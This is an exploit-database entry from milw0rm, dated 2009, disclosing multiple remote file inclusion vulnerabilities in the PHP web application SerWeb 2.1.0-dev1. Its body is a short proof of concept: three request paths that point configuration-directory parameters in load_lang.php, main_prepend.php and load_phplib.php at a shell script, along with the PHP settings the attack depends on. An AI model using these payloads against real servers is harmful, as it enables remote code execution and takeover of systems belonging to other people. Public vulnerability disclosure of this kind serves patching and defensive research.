SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusions

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2009-07-26  
date_updated:   
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 9284.txt  

SerWeb <= 2.1.0-dev1 2009-07-02 Multiple Remote File Inclusion Vulnerabilities
D.Script : http://ftp.iptel.org/pub/serweb/daily-snapshots/
POC:
/load_lang.php?_SERWEB[configdir]=Shell
/main_prepend.php?_SERWEB[functionsdir]=Shell
/load_phplib.php?_PHPLIB[libdir]=Shell
Us = php_flag magic_quotes_gpc Off / php_flag magic_quotes_runtime Off

# milw0rm.com [2009-07-27]